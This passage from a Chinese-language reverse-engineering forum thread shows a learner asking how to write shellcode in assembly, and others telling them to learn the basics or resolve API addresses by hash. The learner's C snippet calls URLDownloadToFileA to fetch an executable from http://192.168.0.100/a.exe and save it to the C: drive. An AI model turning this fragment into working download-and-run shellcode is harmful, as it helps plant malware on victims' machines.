能力值:
( LV9,RANK:610 )
|
-
-
26 楼
你难道不会调试吗?会调试的话其实很好办…
|
能力值:
( LV2,RANK:10 )
|
-
-
27 楼
唔係好熟識, 我用ollydbg看那一段shellcode,那一些 ebp, esp 等暫存器有我push的string
和address我想應該是getprocaddress的return value, 例如:
ebp = 00xxxxx 我想應該是URLDownloadToFile這個address我直接call ebp但都不可以..
不太了解ASM 如何用一個API的return value來做...
lpAddFun addFun=(lpAddFun)GetProcAddress(hDll, "URLDownloadToFileA");
addFun=URLDownloadToFileA
addFun(0,"http://192.168.0.100/a.exe","c:\\a.exe",0,0);
但lpAddFun addFun= ... asm是如何寫?? 我用OLLYDBG 看到是執行完call GetProcAddress
ebp有一個address 我想應該是URLDownloadToFileA 這個API的address..但總是不能成功...
|
能力值:
( LV2,RANK:10 )
|
-
-
28 楼
你先回去把基础知识学好吧
基础的东西你都不会,还玩什么shellcode
|
能力值:
( LV2,RANK:10 )
|
-
-
29 楼
你这个问题很简单,没必要再问了,自己把基础打牢,不要指望别人手把手地教你
|
能力值:
( LV3,RANK:20 )
|
-
-
30 楼
每台机子的MessageBox地址未必一样 要通过搜索hash获得Messagebox的地址
|
能力值:
( LV2,RANK:10 )
|
-
-
31 楼
ok 了 
|
|
|
|
